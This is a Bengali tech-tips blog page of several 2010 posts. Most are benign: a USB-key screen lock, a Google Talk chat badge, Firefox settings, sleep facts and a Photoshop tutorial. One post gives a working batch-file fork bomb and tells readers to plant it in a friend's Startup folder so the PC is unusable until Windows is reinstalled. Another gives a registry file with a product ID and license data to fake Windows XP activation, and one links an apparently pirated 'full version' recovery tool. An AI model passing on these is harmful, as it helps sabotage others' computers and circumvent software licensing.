এবার পেনড্রাইভ দিয়ে কম্পিউটারকে প্রটেক্ট করুন !!

পোস্ট করেছেন Md.Kawsar , শনিবার, ৬ ফেব্রুয়ারি, ২০১০ ৬:৪৪:০০ PM

শিরোনাম দেখে নিশ্চই অবাক হচ্ছেন যে এতদিন কম্পিউটারকে দিয়ে পেনড্রাইভ প্রটেক্ট করেছি এখন আবার এটা কি ? একটু ভাবুন তো আপনার পেনড্রাইভটিকে যদি গাড়ীর চাবির মতো ব্যবহার করা যায় ? যেমন আপনার কম্পিউটারে যদি পেনড্রাইভ লাগানো থাকে তবেই কম্পিউটারকে চালানো যাবে, আবার পেনড্রাইভ খুলে ফেললে সংগে সংগে কম্পিউটার বন্ধ হয়ে যাবে ।এর আরও একটি ব্যবহার ধরুন আপনার গুরুত্বপূর্ন কিছু ফাইল আছে তাই কম্পিউটার কাউকে ব্যবহার করতে দিতে চাচ্ছেন না কিন্তু মুখেও বলতে পারছেন না আবার তার সামনে কম্পিউটার বন্ধ করতে পারছেন না এই মুহুর্তে একমাত্র ভরসা একটাই আস্তে করে পেনড্রাইভটি খুলে ফেলুন ব্যাস সকল সমস্যা সমাধান । এতক্ষনে নিশ্চই বুঝতে পেরেছেন আজকের বিষয় সম্পর্কে ।এবার আসুন আর দেরী না করে ডাউনলোডে কাজটি সম্পন্ন করি । মাত্র ৮৯৪kb ওজনের ফাইলটি নিন এখান থেকে
http://s.techtunes.com.bd/tDrive/tuner/rex/19035/InstallPredator.exe
এবার কম্পিউটারে যে কোন Folder এ Extract করুন এবং Softwareটি ইন্সটল করুন ।

ইন্সটল শেষ হলে iconটিতে ক্লীক করুন



পর্দায় দেখুন ছোট একটি ম্যাসেজ আসবে


এবার পেনড্রাইভটি যথাস্হানে প্রবেশ করান (কোন Format এর প্রয়োজন নেই)।এবার নিচের স্ক্রীনে পাসওয়ার্ড এর ঘরে অবশ্যই পাসওয়ার্ড দিবেন Startup Mode কে Auto start With Windows ঘরে টিক দিয়ে Create keyতে চাপুন ।




বার স্ক্রীনে পাসওয়ার্ড পরিবর্তনের একটি ম্যাসেজ আসবে



আপনার Notification Area তে দেখুন একটি তালার ছবি



বিভিন্ন রং দেখাচ্ছে অর্থাৎ এটি কাজ শুরু করেছে । এবার পেনড্রাইভ এর ভিতরে দেখুন এমন একটি ফোল্ডার দেখাচ্ছে ভুলেও এটিকে মুছবেন না ।


এবার পেনড্রাইভটি খুলে ফেলুন একি কিছুইতো হলো না ? মাউস দিয়ে যে কোন কাজ করার চেস্টা করুন কি ব্যপার !! স্ক্রীন কালো হয়ে গেল কিন্ত মনিটর অন , অনেকটা Standby হলে যেমন হয় এবার কিবোর্ড অথবা মাউস এ চাপ দিয়ে অন করার চেস্টা করুন । পেনড্রাইভটি প্রবেশ করান সংগে সংগে কম্পিউটার অন

১. পেনড্রাইভকে আগের মতোই ব্যবহার করতে পারবেন কোন সমস্যা নেই শুধু Predato.lock নামের Folderটি মুছবেন না ।

২. পেনড্রাইভ খোলা অবস্হায় কম্পিউটার Power Button চেপে Shut Down করতে পারবেন ।

৩. পেনড্রাইভ খোলা অবস্হায় কম্পিউটার Power on করতে পারবেন কিন্তু লগ অন হওয়ার পর পর স্ক্রীন কালো হয়ে যাবে ।

৪. Softwareটিতে ডাবল ক্লীক করলে Modify এবং Remove Option এর সাহায্যে আন-ইন্সটল করতে হবে ।

৫. পেনড্রাইভ ছাড়া কম্পিউটার চালাতে হলে পর পর ৩ বার Enter চাপুন ২০ সেকেন্ডর মধ্যে পাসওয়ার্ড দিন সংগে সংগে কম্পিউটার অন ।

আপনার ব্লগ অথবা ওয়েব সাইটে লাইভ চ্যাট সংযুক্ত করুন

পোস্ট করেছেন Md.Kawsar ৫:৪৬:০০ PM

আজ আমি আপনাদের ওয়েব সাইটে কি ভাবে খুব সহজে লাইভ চ্যাট সংযুক্ত করতে পারেন সে ব্যপারে আলোচনা করবো। প্রথমেই ধন্যবাদ গুগলকে। কারণ গুগলের চ্যাট ব্যবহার করে আপনারা আপনাদের ওয়েব সাইটে লাইভ চ্যাট সংযুক্ত করতে পারবেন। তাই যাদের গুগলের মেইলে একাউন্ট নাই তারা প্রথমে একটা একাউন্ট খুলে নেন। একাউন্ট খোলার জন্য এখানে http://mail.google.com/ ক্লিক করুন । আর যদি আপনাদের একাউন্ট থাকে তাহলে নতুন করে খোলার দরকার নাই।
....................
গুগল টক চ্যাটব্যক :
....................
এখন আমরা গুগলের টক চ্যাটব্যক ব্যবহার করবো। ব্যবহার করার জন্য প্রথমে এখানে http://www.google.com/talk/service/badge/New ক্লিক করুন এবং আপনার গুগলের আইডি ও পাসওয়ার্ড ব্যবহার করে লগিন করুন। লগিন করার পর আপনি নিচের মত একটা পেজ দেখতে পাবেন।


উপরের ছবির বর্ণণা :

(১) আপনার সাইটে চ্যাট অপশন সংযুক্ত করলে এমন দেখতে পাবেন যদি আপনি আপনার জিমেইলে লগিন করে থাকেন।
(২) চ্যাট বক্সের লিখা পরিবর্তন করতে চাইলে Edit এ ক্লিক করতে হবে।
(৩) এটা হলো HTML কোড যেটা আপনার সাইটে বসাতে হবে ।

চ্যাট বক্সের লিখা পরিবর্তন :

আপনি যদি চ্যাট বক্সের লিখা পরিবর্তন করতে চান তাহলে Edit এ ক্লিক করুন। ক্লিক করলে নিচের মত দেখতে পাবেন।

* এবার আপনি যদি আপনার নাম পরিবর্তন করতে চান, “Your nickname” এর ভ্যালু পরিবর্তন করুন।
* আপনি “Style” থেকে আপনার চ্যাট বক্সের ডিজাইন পরিবর্তন করতে পারবেন ।
* আপনি যদি আপনার গুগল চ্যাটের Status দেখাতে চান, “Show your status message” এ ক্লিক করে চেক করে দিন।
* আপনি যদি আপনার মনের মত নিজের লিখা দেখাতে চান তাহলে “Title (optional)” এর ভ্যালু পরিবর্তন করুন।
* সব পরিবর্তন করে “Update badge” এ ক্লিক করুন।

সর্বশেষ কাজ হলো HTML কোড আপনার সাইটের সংযুক্ত করা। আপনি চ্যাট বক্সটা যেখানে দেখাতে চান, HTML কোড কপি করে আপনার সাইটের ফাইলে সে জাইগাই সংযুক্ত করুন। ব্যস !!!!!

এবার আপনার সাইট ভিজিট করে দেখেন আপনার সাইটে আপনি যেখানে HTML কোড বসিয়েছেন সেখানে চ্যাট বক্স দেখতে পাবেন । যেমন আমার সাইটে নিচের মত দেখতে পাবেন। আমি অবশ্য বাংলাতে টাইটেল দিয়েছি :) ।

এখন আপনি আপনার জিমেইলে লগিন করেন ওয়েব ব্রাউজার দিয়ে অথবা গুগল চ্যাট দিয়ে লগিন করে থাকেন। আপনার ওয়েব সাইট ভিজিটররা এখন থেকে আপনার সাইট থেকে লগিন না করে আপনার সাথে আপনার জিমেইলে চ্যাট করতে পারবে খুব সহজেই।

আশা করি আপনারা আপনাদের সাইটে ভাল ভাবে লাইভ চ্যাট সংযুক্ত করতে পারবেন । যদি কোন সমস্যা হয়, তাহলে আমাকে জানাবেন। আমি সমাধান দেয়ার জন্য চেষ্ঠা করবো ।

যদি আপনাদের ভালো লাগে তাহলে ধন্যবাদ দিয়ে আমাকে উৎসাহিত করবেন।

memory card corrupted টিপস এবং ট্রিকস

পোস্ট করেছেন Md.Kawsar ৫:২৩:০০ PM


আমি এখানে ব্যবহার করেছি microSD মেমরি কাড’ এবং মেবাইল ফোন নকিয়া N95।
প্রবলেম: আমরা মোবাইল ফোন থেকে মেমরি কাড’ খুলে কাড’রিডার এর মাধ্যমে পিসিতে যে কোন কাজের জন্য ব্যবহার করি বা কোন কিছু কপি করি আনেক সময় দেখা যায় কাড’রিডার দিয়ে পিসিতে কানেক্ট করি তখন পিসিতে “not responding” হয় তখন আমরা আবার মেমরি কাড’টি মোবইলে প্রবেশ করাই তখনই মোবাইল ফোনের স্ক্রিনে ভেসে আসে এই লেখাটি MEMORY CARD CORRUPTED!
সাথে সাথে আপনাকে আমটা মেসেজ দিবে ফরমেট করার জন্য আপনি ফরমেট করবেন না NO! তে ক্লিক করবেন।
এই সমস্যার সমাধান করতে হলে একটা সফট’ওয়ার ডাউনলোড করতে হবে এই সফটওযারটির সাম হলো r-studio এখানে ক্লিক করে ডাউনলোড করতে পারবেন

http://www.ziddu.com/download/8448955/R-Studio.4.0.124074.rar.html

সমাধান:
(১) প্রথমে আপনাকে মেমরি কাড’টি কাড’রিডারের মাধ্যমে পিসিতে কানেক্ট করুন, সফাওয়ারটি পিসিতে ইনস্টল করুন তারপর সপটওয়ারটি ওপেন আবস্থায় examine ক্লিক করুন একটা মেসেজ আসবে it’s ok succeed
(২) এবার মেমরি কাড’টি safely পিসি থেকে ডিসকানেক্ট করুন ।
এখন মেমরি কাড’টি মোবাইল এবং পিসিতে প্রবেশ করালে এরর দেখাবে না
বি:দ: মেমরি কাড’টির যে ডাটা ছিলো তার কোন পরিবত’ন হবে না…সফটওয়ারটি ফুল ভাস’ন

আপনার ছবিকে TEXT এ রূপান্তরিত করুন

পোস্ট করেছেন Md.Kawsar ৫:০৬:০০ PM


আজকাল আমরা অনেক হ্যাকিং সাইট থেকে অনেক প্রোগ্রাম ডাউনলোড করি। সেই সব প্রোগ্রামের সাথে অনেক সময় অনেক Text ফাইল থাকে যেখানে খুব সুন্দর করে Text দিয়ে লিখা অনেক ছবি দেখা যায়। আবার কোন বাক্যকে অনেক অক্ষর দিয়ে আর্ট করা থাকে। আমি নিজে অনেক চেষ্ঠা করেছি নিজে নিজে বানানোর। কিন্তু খুব ভালো হয় না। এরপর ইন্টারনেটে সার্চ করার পর ভালো একটা প্রোগ্রাম পেয়েছি যেটা দিয়ে আপনারা আপনাদের যে কোন ছবি সাদা-কালো অথবা রংগিন Text ফরমাটে রূপান্তরিত করতে পারবেন।

প্রোগ্রামটির নাম ASCII Generator dotNET । এই প্রোগ্রামটি ব্যবহার করে আপনি আপনার ছবিকে নিজের পছন্দমত ইংরেজি লেটার দিয়ে সাজাতে পারেন।



নিচে একটি সাদা-কালো এবং রংগিন ছবির নমুনা দেয়া হল





প্রোগ্রামটি ডাউনলোড করার জন্য এখানে ক্লিক করুন ।
http://ascgendotnet.jmsoftware.co.uk/download
প্রোগ্রামটি ব্যবহার করতে কোন সমস্যা হলে আমাকে জানান।

নোটপ্যাড যাদু – কাঁদিয়ে ছাড়ুন আপনার বন্ধুকে …

পোস্ট করেছেন Md.Kawsar ৫:০৩:০০ PM

আগের দিনের ট্রিকসটা তেমন একটা ভালছিল না। তাই আজকে একটা জোসস ট্রিকস নিয়ে এসেছি যা দিয়ে আপনি আপনার বন্ধু বা নিযে ভয় পেয়ে কেঁদেও দিতে পারেন।
যে হেতু এটি একটা নোটপ্যাড ট্রিকস তাই বানাতেও খুব সহজ।
তবে ট্রিকসটি শেখার আগে একটা কথা এটা যখন প্রথম আমার নিযের পিসিতে বানিয়ে চালু করি (আমি জানতাম যে এটা পিসির কোন ক্ষতি করবে না) তারপরও আমি এতটা ভয় পেয়েছি যে আমি আর কোনদিন আমার পিসিতে এটা আর বানাবো না।যা হোক চলুন দেখি কি ভাবে তৈরি করবেন।
...............................
কাটা চামচ বোমা
...............................
১. * নতুন নোটপ্যাড ওপেন করুন।
২. * নিম্নলিখিত কোডটি কপি পেষ্ট বা টাইপ করুন।

::LOL.bat
:s
start %0 "LOL.bat"
goto s

৩.এবার LOL.bat লিখে সেভ করুন।
৪. ফাইলটি ডাবল ক্লিক করুন এবং দেখুন মজা।

এটা একবার আপনার পিসিতে ট্রাই করে দেখুন …যদি ভয় না পান তাহলে আমাকে জানাবেন।আমি বুঝবো যে আমি একটা ভিতু(কারণ আমি ভয় পেয়েছি) ……. আর যদি ভয় পান তবে আমার কোন দোষ নেই।
এটা দিয়ে উপরের মত মজা তো করতে পারবেন সাথে বড় আকারের একটা হ্যাকও করতে পারবেন।
যে ভাবে করবেন -
LOL.bat ফাইলটি কাট করে startup folder গিয়ে পেষ্ট করতে হবে।


এবার থেকে যখনই পিসি চালু করবে অটোমেটিক ভাবে কাটা চামচ বোমা চালু হয়ে যাবে।তারপর যতক্ষণ আর ঐ পিসিতে নতুন করে XP সেটাপ না দেয়া হবে ততক্ষণ পর্যন্ত কোন কাজ করতে পারবে না।

যে ভাবে নোটপ্যাড দিয়ে আপনার রাম পরিষ্কার করবেন

পোস্ট করেছেন Md.Kawsar ৪:৫১:০০ PM

১. * নতুন নোটপ্যাড ওপেন করুন।
২. * নিম্নলিখিত কোডটি কপি পেষ্ট বা টাইপ করুন।

FreeMem=Space(64000000)

৩.এবার RAMcleaner.VBS লিখে ডেক্সটপ এ সেভ করুন।



৪.এবার যখনই আপনার পিসির রাম পরিষ্কার করার দরকার তখন শুধু ফাইলটি ডাবল ক্লিক করুন।

বিঃদ্রঃ- এই ট্রিকসটি হয়তো বা ১০০ জনের ৩০এরই জানা থাকতে পারে।কিন্তু বাকি অজনা ৭০ জনের জন্য এই টিউনটি।

খুব সহজে আপনার Windows XP টা Genuine করে নিতে পারবেন।

পোস্ট করেছেন Md.Kawsar ৪:১৩:০০ PM

আজকে আপনাদের যে নোটপ্যাড ট্রিকসটি শেখাবো তা দিয়ে আপনি খুব সহজে আপনার Windows XP টা Genuine করে নিতে পারবেন।চলুন তাহলে শুরু করা যাক …..
Windows XP Genuine
# ১. নোট প্যাড ওপেন করুন।
# ২. নিম্নলিখিত কোডটি কপি পেষ্ট করুন।

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion]
"CurrentBuild"="1.511.1 () (Obsolete data - do not use)"
"ProductId"="55274-640-7450093-23464"
"DigitalProductId"=hex:a4,00,00,00,03,00,00,00,35, 35,32,37,34,2d,36,34,30,2d,\
37,34,35,30,30,39,33,2d,32,33,34,36,34,00,2e,00,00 ,00,41,32,32,2d,30,30,30,\
30,31,00,00,00,00,00,00,00,62,fc,61,4c,e0,26,33,16 ,05,d3,54,e7,a0,de,00,00,\
00,00,00,00,49,36,c2,49,20,47,0c,00,00,00,00,00,00 ,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,33,33,35,30,30,00 ,00,00,00,00,00,00,65,10,\
00,00,74,99,dd,b0,f7,07,00,00,98,10,00,00,00,00,00 ,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 ,c4,ae,d6,1c
"LicenseInfo"=hex:e7,77,18,19,f8,08,fc,7d,e8,f0,df ,12,6e,46,cb,3f,ad,b2,dd,b9,\
15,18,16,c0,bc,c3,6a,7d,4a,80,8b,31,13,37,5a,78,a2 ,06,c8,6b,b9,d9,dd,cc,6a,\
9c,c5,9b,77,aa,07,8d,56,6a,7c,e4

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WPAEvents]
"OOBETimer"=hex:ff,d5,71,d6,8b,6a,8d,6f,d5,33,93,f d
# ৩. এবার ফাইল টাইপে all files আর ফাইলের নামে(আপনার নাম).reg লিখে সেভ করুন।
# ৪. ফাইলটি ডাবল ক্লিক করুন।
# ৫. আপনাকে জিজ্ঞাসা করবে “are you sure?” Tell It Yes.

এবার দেখুন আপনার Windows XP টা Genuine হয়ে গেছে।

এবার নিচের লিংক যান -
http://www.microsoft.com/genuine/downloads/FAQ.aspx
৬. Validate উইন্ডোজে ক্লিক করে সহজ Step গুলা ফলো করুন।

2x গুন করে নিন আপনার Mozilla Firefox এর গতিকে

পোস্ট করেছেন Md.Kawsar ৩:৫৫:০০ PM


আমরা সাধারণত প্রায় সবাই মজিলা ফায়ারফক্স ব্যবহার করি। কারণ ইহা সবথেকে ভালো। কিন্তু আমরা কী ফায়ারফক্স কে সর্বউত্তম ভাবে ব্যবহার করি? আমরা কী ইহার খুব ভালো গতি পাই? পাই না। তাহলে কেন এই ফায়ারফক্স ব্যবহার করি? আপনি যদি এরকম অসনতুস্ট হন। তাহলে দিগুন করেনিন আপনার মজিলা ফায়ারফক্স কে।
প্রথমে ফায়ারফক্স ওপেন করুন, আর যদি ওপেন করা থাকে তা হলে একটি New Tab খুলুন এবং এর এড্রেস বারে টাইপ করুন about:config তারপর এন্টার দিন।

এরকম একটি সতর্ক বার্তা আসবে । I`ll be careful, I promise! বাটন এ ক্লিক করুন।
নতুন একটি লিস্ট আসবে। এখন Filter: নামক বারে network.http.p লিখুন।

“network.http.pipelining”—————–> true
Set “network.http.proxy.pipelining”———-> true
Set “network.http.pipelining.maxrequests—> 30
এসব set করতে ঐ গুলার উপর ডাবল ক্লিক করুন।
এখন আবার Filter: বার এ network.dns.disableIPv6
এবং network.dns.disableIPv6——————> true করে দিন।
তারপর উইন্ডোর যে কোন জায়গায় মাউস এর রাইট বাটন ক্লিক করে New-> Integer সিলেক্ট করে nglayout.initialpaint.delay নাম দিয়ে ভ্যালু 0 দিন।
একইভাবে
New > Boolean সিলেক্ট করে খালি বক্সে content.notify.ontimer টাইপ করে OK করুন এবং True সিলেক্ট করে OK করুন।
New > Boolean সিলেক্ট করে খালি বক্সে content.interrupt.parsing টাইপ করে OK করুন এবং True সিলেক্ট করে OK করুন।
New > Integer সিলেক্ট করে খালি বক্সে content.notify.interval টাইপ করে OK করুন এবং 750000 টাইপ করে OK করুন।
New > Integer সিলেক্ট করে খালি বক্সে content.max.tokenizing টাইপ করে OK করুন এবং 2250000 টাইপ করে OK করুন।
New > Integer সিলেক্ট করে খালি বক্সে content.notify.backoffcount টাইপ করে OK করুন এবং 5 টাইপ করে OK করুন।
New > Integer সিলেক্ট করে খালি বক্সে content.switch.threshold টাইপ করে OK করুন এবং 750000 টাইপ করে OK করুন।
এখন আপনার মজিলা restart দিন এবং উপভোগ করুন দিগুন গতি।

ফ্রী SMS পাঠান যত খুশি যেকোন মোবাইল নাম্বারে

পোস্ট করেছেন Md.Kawsar ৩:৪৮:০০ PM


এখন আপনাদেরকে এমন একটি সাইট এর সাথে পরিচয় করিয়ে দেব যার মাধ্যমে আপনি ফ্রী SMS পাঠাতে পারবেন যেকোন মোবাইল ফোনে।
আর এই সাইট এর নাম হল Master Degree SMS
আপনি যে মোবাইল নাম্বারে SMS পাটাবেন অবশ্যই আপনাকে সেই নাম্বারটি যে দেশের তার কোড নাম্বার সহ টাইপ করতে হবে। যেমন ধরুন বাংলাদেশ কোড নাম্বার হল ৮৮ , অতএব আপনাকে বাংলাদেশ কোন মোবাইল নাম্বারে SMS পাঠাতে হলে মোবাইল নাম্বারটির আগে ৮৮ লিখতে হবে।
এবং সর্বশেষ আপনাকে একটি catcher image টাইপ করে দিতে হবে। এখন শুধু Send বাটন এ ক্লিক করলে আপনার কাঙ্খিত নাম্বারে SMS টি পৌছে যাবে।
যদি SMS টি না পৌছে থাকে তাহলে আপনাকে জানিয়ে দেয়া হবে।

ঘুমের বিশ তথ্য, এক পরীক্ষা

পোস্ট করেছেন Md.Kawsar , বৃহস্পতিবার, ৪ ফেব্রুয়ারি, ২০১০ ৮:৫৫:০০ PM

এই লেখাটি পড়ে শেষ করার আগেই কি আপনার তন্দ্রা এসে হানা দেবে ? যদি তাই হয় তবে বলতে হয়, আপনি প্রতিদিন পর্যাপ্ত পরিমাণে ঘুমোচ্ছেন। কিংবা আপনার ভালো ঘুম হচ্ছে না, যদিও আপনি মনে করছেন আপনি ঠিক মতোই ঘুমোচ্ছেন। ওটোয়া হসপিটাল স্লিপ সেন্টারে ঘুম বিষয়ক প্রযুক্তিবিদ ক্যাথি লাটলি ব্যাবল্যান্ড বলেন, পূর্ণবয়স্ক লোকের অর্ধেক লোক হয় প্রয়োজনীয় সময় ঘুমায় না, নয়তো চোখ বন্ধ থাকলেও তাদের ভালো ঘুম হয় না। তার কথা হচ্ছে মানুষ দীর্ঘমেয়াদে ঘুমবঞ্চিত থাকে। আপনি দিনে ৬ থেকে ৭ ঘন্টা ঘুমোবার পরও যদি পরিশ্রান্তি অনুভব করেন, তবে ধরে নিতে আপনার ঘুমে কোন সমস্যা আছে। সমস্যাটা কত তীব্র তা জেনে নিন নিচে বর্ণিত পরীক্ষাটি নিজে নিজে সম্পন্ন করে। এই পরীক্ষাটির নাম Epworth Sleepiness Scale| এর মাধ্যমে আপনি জেনে নিতে পারবেন আপনার ঘুমের গুণগত মান।

এ পরীক্ষার জন্য আপনাকে নিচে উল্লিখিত আটটি পরিস্থিতিতে আপনার ঘুম বা তন্দ্রা আসার সম্ভাবনার মাত্রা হিসাব করতে হবে। পরিস্থিতি আটটি হলো :

* ১. বসে থাকা বা পড়ার সময়;
* ২. টেলিভিশন দেখার সময়;
* ৩. জনসমাগম স্থলে অলস বসে থাকার সময়;
* ৪. যাত্রী হিসাবে ১ ঘন্টা গাড়িতে বসে থাকার সময়;
* ৫. বসে কারো সাথে কথা বলার সময়;
* ৬. বিকালবেলা শুয়ে বিশ্রাম নেবার সময়;
* ৭. কোন নেশা পান না করে দুপুরের খাবারের পর বসে থাকার সময়;
* ৮. গাড়ী চালানোর সময় যানজটে কয়েক মিনিট আটকে থাকার সময়।

প্রতিটি ক্ষেত্রে আপনার ঘুম আসার সম্ভাবনা যাচাই করুন এবং সে অনুযায়ী স্কোর পয়েন্ট গুনে নিন। যদি ঘুম আসার সম্ভাবনা না থাকে তাহলে স্কোর পয়েন্ট শূন্য। সামান্য সম্ভাবনা থাকলে স্কোর পয়েন্ট ১। মোটামুটি সম্ভবনার জন্য স্কোর পয়েন্ট ২। মোট স্কোর পয়েন্ট ০-৬ হলে আপনি পর্যাপ্ত পরিমাণে ঘুমোচ্ছেন। ৭-৮ হলে আপনি গড়পরতা ঘুমোচ্ছেন। স্কোর পয়েন্ট ৯ কিংবা তারচেয়ে বেশী হলে চিকিৎসকের পরামর্শ নিন।
ঘুম নিয়ে বিশ তথ্য :

* ১. দীর্ঘমেয়াদী নাক ডাকা রোগের চিকিৎসা হচ্ছে । এটি একটি সার্জিক্যাল প্রক্রিয়া। এর মাধ্যমে নরম তালু ও গলার কোষগুলো আঁটসাঁট করে দেওয়া হয়।
* ২. আরেকটি বিকল্প উপায় হচ্ছে তালুতে রাসায়নিক ইনজেকশন করে নরম কোষকে শক্ত করে দেওয়া। এর নাম ।
* ৩. ২০০২ সালের অক্সফোর্ড বিশ্ববিদ্যালয়ের একটি গবেষক দল অভিমত প্রকাশ করেন, ভেড়া গণনা অনুশিলন করলে অনিদ্রা কেটে যাওয়ার ধারণাটি পুরোপুরি ভুল, বরং এ মানসিক কর্মটি এতই অবসাদের যে, এর ফলে নানা পার্শ্বপ্রতিক্রিয়া দেখা দেয়।
* ৪. একটি তোষক বা জাজিমের গড় বয়স ১০ বছর। এসময়ে এগুলোর মাঝে নোংরা উপাদান জন্ম নেয়। তোষকের ব্যাকটেরিয়া সংক্রান্ত এক সমীক্ষায় দেখা গেছে, এই ব্যাকটেরিয়া শিশুদের আকস্মিক মৃত্যুর কারণ হতে পারে।
* ৫. বিছানায় পূর্ণবয়স্ক একটি ছাড়পোকা না খেয়ে এক বছর পর্যন্ত বেঁচে থাকতে পারে।
* ৬. ২০০৪ সালে আমেরিকায় সাড়ে তিন কোটির বেশী রোগীর প্রেসক্রিপশনে ঘুমের বড়ির পরামর্শ ছিল। এরপর ২০-২৪ বয়সী ঘুমের বড়ি খাওয়া রোগীর সংখ্যা এই চার বছরে দ্বিগুনে পৌঁছেছে।
* ৭. তন্দ্রাচ্ছন্ন কারনে আমেরিকায় বছরে এক লাখ গাড়ি দূর্ঘটনা ঘটে। গাড়িচালক সেলফোনে কথা বলার ফলে এ হার ৬ শতাংশ বেড়েছে।
* ৮. শরীরে রয়েছে ঘুম থেকে জাগার একটি এলার্ম ক্লক। এর ফলে মানুষ ইচ্ছামতো সময়ে স্বাভাবিকভাবে ঘুম থেকে জাগতে পারে। স্ট্রেচ হরমোন adrenocorticotropin-Gi পেছনে কাজ করে। সম্ভাব্য জাগার সময়ের ১-২ ঘন্টা আগে এই হরমোনের মাত্রা বাড়তে শুরু করে।
* ৯. এক লাখ পূর্ণ বয়স্ক লোকের উপর ছয় বছর ধরে এক সমীক্ষা চালিয়ে দেখা গেছে যারা রাতে ৬-৭ ঘন্টা ঘুমায় তাদের মৃত্যুহার কম ৮ ঘন্টা করে যারা দৈনিক ঘুমায় তাদের চেয়ে।
* ১০. ১৯৬৪ সালে ১৭ বছর বয়সী ব্যান্ডি গার্ডনার জেগে ছিল ২৬৪ ঘন্টা ১২ মিনিট। এটা কর্মকৃত থাকার সবচেয়ে বড় বিশ্ব রেকর্ড।
* ১১. ইউরোপীয় ইউনিয়নের সাথে মিল রেখে স্পেন একটি প্রচারণা অভিযান চালু করেছে। আর তা হলো প্রচলিত মধ্যাহ্নকালীণ নিদ্রা এবং বৈকালিক সল্প সময়ের ঘুম পরিহারের।
* ১২. স্পেনীয়রা বৈকালিক সল্প সময়ের ঘুমের কারনে ইউরোপীয়দের তুলনায় রাতে গড়ে ৪০ মিনিট কম ঘুমায়। কর্মস্থলে দূর্ঘটনা ইউরোপীয় ইউনিয়নের মধ্যে স্পেনেই সবচেয়ে বেশী।
* ১৩. কথায় আছে, যারা জেগে ঘুমায় তাদের কখনও জাগানো যায় না।
* ১৪. তিমি ও ডলফিন অর্ধেক জেগে ও অর্ধেক ঘুমিয়ে কাটায়। এদের মস্তিষ্কের অর্ধাংশ পর্যায়ক্রমে ঘুমে থাকে।
* ১৫.স্বপ্ন দেখা প্রবল বৈদ্যুতিক কর্মকান্ডের সাথে সংশ্লিষ্ট , যা মস্তিষ্ক মূলে ঘুমের সময় প্রতি ৯০ মিনিটে একবার করে আঘাত করে।
* ১৬. সারাজীবনে একজন মানুষ গড়ে ছয় বছর স্বপ্ন দেখে কাটায়। তার স্বপ্নের সংখ্যা দাঁড়ায় ১ লাখ ৩৬ হাজার। কিন্তু আমরা এখনও জানিনা মানুষ কেন স্বপ্ন দেখে।
* ১৭. আমেরিকায় ৫০ লাখ শিশু রাতে বিছানায় প্রস্রাব করার রোগে ভোগে।
* ১৮. ঘুমাতেও অনেকে ভয় পায়। এ ভীতি রোগের নাম Somniphobia|
* ১৯. এ পর্যন্ত কোন সেলিব্রেটি পাওয়া যায় নি যিনি ঘুমভীতি রোগে ভুগছেন।
* ২০. ভারতের সাবেক প্রেসিডেন্ট আবদুল কালাম বলেছেন, ঘুমের মধ্যে স্বপ্ন আসলে স্বপ্ন নয়, আসল স্বপ্ন হচ্ছে জেগে স্বপ্ন দেখা। যে স্বপ্ন আপনাকে ঘুমাতে দেবে না।

ফটোশপ দিয়েই তৈরি করি নিজের ওয়েব সাইটের হেডার।- (৩য় অংশ)

পোস্ট করেছেন Md.Kawsar ৮:০৫:০০ PM

ফটোশপ দিয়েই তৈরি করি নিজের ওয়েব সাইটের হেডার।- (২য় অংশ) শেষে আমাদের কাজটি ছিল নিচের ছবিটার মত।

এ পর্যায়ে আমাদেরকে name নামে নতুন একটি layer নিয়ে এখন keyboard হতে T press করে Type Tool টি নির্বাচন করে Site name টি লেখতে হবে যেখানে F0nt: Engravers MT , Font size: 72 Pixelএবং Font color: #000000 বা Black নির্বাচন করে দিতে হবে। এ পর্যায় শেষে আমরা আমাদের সাইটের হেডারটি নিচের মত দেখাবে।

এখন name Layer টিতে Bevel and Emboss ইফেক্ট দেওয়ার জন্য আমাদেরকে name Layer টির উপর ডাবল ক্লিক করে Layer Style উইন্ডো থেকে নিচের ছবির মত করে সেটিংস্ নির্বাচন করতে হবে।

এবার Inner glow ইফেক্ট দেওয়ার জন্য Layer Style উইন্ডো থেকে নিচের ছবির মত করে সেটিংস্ নির্বাচন করতে হবে।

এবার Outer glow ইফেক্ট দেওয়ার জন্য Layer Style উইন্ডো থেকে নিচের ছবির মত করে সেটিংস্ নির্বাচন করতে হবে।

সবকিছু ঠিক থাকলে হেডারটা নিচের মত হবে।

ফটোশপ দিয়েই তৈরি করি নিজের ওয়েব সাইটের হেডার।- (১ম অংশ)

পোস্ট করেছেন Md.Kawsar ৭:৩৮:০০ PM

পৃথিবীতে এমন কোন ওয়েব ডিজাইনার খুজে পাওয়া বেশ কষ্টই হবে যিনি ফটোশপ ব্যবহার করেন না। ওয়েব ডিজাইনারদের কাছে ফটোশপ ঠিক এতটাই জনপ্রিয়। যা হোক আমদের যে কেও নিজের জন্য হোক বা অন্যের জন্য হোক ওয়েব ডিজাইন করতে গিয়ে প্রথমেই যে বিষয়টি ভাবতে হয় তা হল ওয়েব সাইটের জন্য একটি আকর্ষনীয় হেডার তৈরি করা । যা ওয়েবসাইটের প্রাথমিক পরিচয় বহন করে। এখন আমরা কিভাবে ফটোশপ ব্যবহার করে একটি আকর্ষনীয় হেডার তৈরি করা যায় তা দেখব।

প্রথমে Adobe Photoshop CS4 ওপেন করে 1000 pixels by 175 pixels এর একটি নতুন ডকুমেন্ট তৈরি করতে হবে। Background Contents : White এবং Resolation : 72 রাখতে হবে।

এখন একটি নতুন Layer নিয়ে ground নাম দিতে হবে এবং keyboard হতে U press করে Rectangle Tool টি নির্বাচন করতে হবে। এরপর সম্পূর্ণ ডকুমেন্ট জুড়ে একটি Rectangle তৈরি করতে হবে। তারপর ground Layer টির উপর ডাবল ক্লিক করে Layer Style উইন্ডোতে প্রবেশ করে এখান থেকে Gradient Overlay তে টিক চিহ্ন দিয়ে Gradient লেখা কালার বক্সটিতে ক্লিক করে Gradient editor উইন্ডোতে প্রবেশ করতে হবে। Gradient editor এর বাম দিকের Color stop #333333 এবং ডান দিকের Color stop #000000 নির্বাচন করি সব শেষে OK বাটনে ক্লিক করতে হবে।

